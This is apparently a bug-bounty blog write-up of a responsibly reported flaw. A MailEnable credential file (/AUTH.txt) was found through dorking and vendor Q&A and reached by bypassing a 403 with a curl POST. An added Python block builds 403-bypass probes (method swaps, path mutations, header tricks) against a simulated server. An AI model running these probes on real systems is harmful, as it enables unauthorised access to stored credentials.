Admin panel Bypassed Just by reading “support team quotes”
Hi, Ajak Amicos, welcome back to another blog. This flaw was found by one of our followers, @cybersec_praveenarsh, so in today's blog I will show how he bypassed an admin panel just by reading the support team's Q&A. Interesting, right? Before starting, if you haven't subscribed to our channel, do subscribe, guys: content related to cyber security, bug bounty, and digital forensics investigation.
Blog Credits: @cybersec_praveenarsh
Follow our Youtube Channel: @ajakcybersecurity (360 Videos)
Follow on Instagram: AjakCybersecurity
Buy me Coffee: https://buymeacoffee.com/ajak
Recon:
Let's take my target as redacted.com. As usual, I collected subdomains using subdomainfinder.c99.nl, but I got only 20+ subdomains, so I moved on to manual recon with Google dorks.
Let's start. I used normal dorks like "site:.target.com", but I only got the same subdomains I had already seen in subdomainfinder.c99.nl. So let's filter those out and drop the unwanted subdomains with this dork: "site:.target.com -www -ping -cdn -connect". Finally, I found one subdomain, mail.target.cloud.
Enumeration:
This subdomain looked like an admin and user mail portal. I used Wappalyzer for further enumeration; it showed basic services like Cloudflare, Apache, and PHP. More interesting, the mail service was provided by a third-party product, MailEnable.
I tried common admin credentials and default passwords, but nothing interesting came up. Time for some research. I went to the MailEnable.com support Q&A and noticed one question: "The AUTH.tab does not exist in my bin." That told me that MailEnable keeps its credentials in AUTH.tab files. They normally live on the server's local filesystem, but on some web servers a copy ends up under the web root because developers saved it there to make API calls easier.
Knowing the file name, I went to the target and requested /AUTH.tab. It returned a 404, but /AUTH.txt returned a 403.
Exploitation:
I opened Kali Linux and ran my favourite 403 bypass tool, 4-ZERO-3 (https://github.com/Dheerajmadhukar/4-ZERO-3). After fuzzing, I found one 200 response, which indicated that the server accepts POST requests to the file. So I used the following curl command:
curl -i -X POST http://mail.target.com//AUTH.txt
Inside were credentials (which I won't expose here). I tried them on the login, and yes, it worked!
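What the fuzzing step above actually does is worth seeing in code. The block below is an added example, not the author's code and not part of 4-ZERO-3: it generates the request variants such tools typically send (method swaps, path mutations like the doubled slash in the curl command, and override headers), runs each through a caller-supplied `send` callable, and returns the variants that came back 200. Because it cannot talk to the real target, `fake_mail_target` is a constructed stand-in that reproduces the symptoms from the Enumeration and Exploitation sections (AUTH.tab 404, AUTH.txt 403 on GET but served on other methods); the hostname, the file names and the "deny rule scoped to GET/HEAD" explanation it encodes are assumptions for illustration, not something the write-up confirms.

```python
"""Added example (not the original post's code): model of a 403-bypass probe.

Builds the method/path/header variants a 403 fuzzer tries, feeds them to a
`send` callable and keeps the ones answered with 200.  `fake_mail_target`
is a constructed server model; mail.target.com and AUTH.txt are assumptions.
"""
from dataclasses import dataclass
from typing import Callable, List, Tuple
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Probe:
    method: str
    url: str
    headers: Tuple[Tuple[str, str], ...] = ()


# Method swaps: a deny rule that only covers GET/HEAD lets the rest through.
METHODS = ("GET", "HEAD", "POST", "PUT", "OPTIONS", "TRACE")

# Header tricks: "{path}" means the header carries the real path while the
# request itself goes to "/"; the IP headers try to look like localhost.
HEADER_TRICKS = (
    ("X-Original-URL", "{path}"),
    ("X-Rewrite-URL", "{path}"),
    ("X-Forwarded-For", "127.0.0.1"),
    ("X-Custom-IP-Authorization", "127.0.0.1"),
)


def path_variants(path: str) -> List[str]:
    """Mutations of one path that commonly slip past a literal path-based deny rule."""
    head, _, last = path.rstrip("/").rpartition("/")
    prefix = head + "/"                 # "" + "/" == "/" for a root-level file
    variants = [
        path,                           # as requested
        "/" + path,                     # doubled leading slash, e.g. //AUTH.txt
        path + "/",                     # trailing slash
        path + "%20",                   # trailing encoded space
        path + ";",                     # path-parameter separator
        prefix + "./" + last,           # dot segment
        prefix + "%2e/" + last,         # encoded dot segment
        prefix + last.lower(),          # case changes (matter on case-insensitive hosts)
        prefix + last.upper(),
    ]
    return list(dict.fromkeys(variants))  # de-duplicate, keep order


def build_probes(url: str) -> List[Probe]:
    """Every (method, path variant) pair plus the header-based variants on GET."""
    parts = urlsplit(url)
    base = f"{parts.scheme}://{parts.netloc}"
    probes = [Probe(m, base + v) for v in path_variants(parts.path) for m in METHODS]
    for name, value in HEADER_TRICKS:
        if value == "{path}":
            probes.append(Probe("GET", base + "/", ((name, parts.path),)))
        else:
            probes.append(Probe("GET", base + parts.path, ((name, value),)))
    return probes


def find_bypasses(url: str, send: Callable[[Probe], int]) -> List[Probe]:
    """Run all probes through `send` (returns an HTTP status) and keep the 200s."""
    return [p for p in build_probes(url) if send(p) == 200]


def fake_mail_target(probe: Probe) -> int:
    """Constructed model of the observed behaviour, used instead of a live host.

    AUTH.tab does not exist (404).  AUTH.txt exists but is denied (403), except
    that the deny rule is assumed to cover only GET/HEAD, so any other method is
    served (200).  The file-name normalisation is deliberately crude.
    """
    name = urlsplit(probe.url).path.strip("/").split("/")[-1].lower()
    if name.startswith("auth.tab"):
        return 404
    if name.startswith("auth.txt"):
        return 403 if probe.method in ("GET", "HEAD") else 200
    return 404


if __name__ == "__main__":
    for hit in find_bypasses("http://mail.target.com/AUTH.txt", fake_mail_target):
        print(hit.method, hit.url, dict(hit.headers))
```

Against the constructed server every POST/PUT/OPTIONS/TRACE variant of /AUTH.txt comes back 200 while all GET variants stay at 403, which is exactly the pattern that points at a method-scoped rule rather than a path-matching bug; to use the generator for real, replace `fake_mail_target` with a function that issues the request (for example with `requests.request(p.method, p.url, headers=dict(p.headers))`) and returns `status_code`, and expect far fewer hits.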
Reporting:
Finally, I reported this to the organization with a full explanation, including how to fix the issue. After our conversation they paid a small bounty of $25, their reasoning being that the root cause lay with a "third party". Disappointing, but that is how it went.
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
I hope you learned something from this blog; if so, kindly press that follow button for further updates, and don't forget to give credit if your bug gets triaged :) Best wishes from Ajak Cybersecurity. ❤️ You can also support me by buying me a coffee: https://buymeacoffee.com/ajak
"கற்றவை பற்றவை" (what you learn, hold on to) 🔥
Learn Everyday, Happy Hacking 😁🙌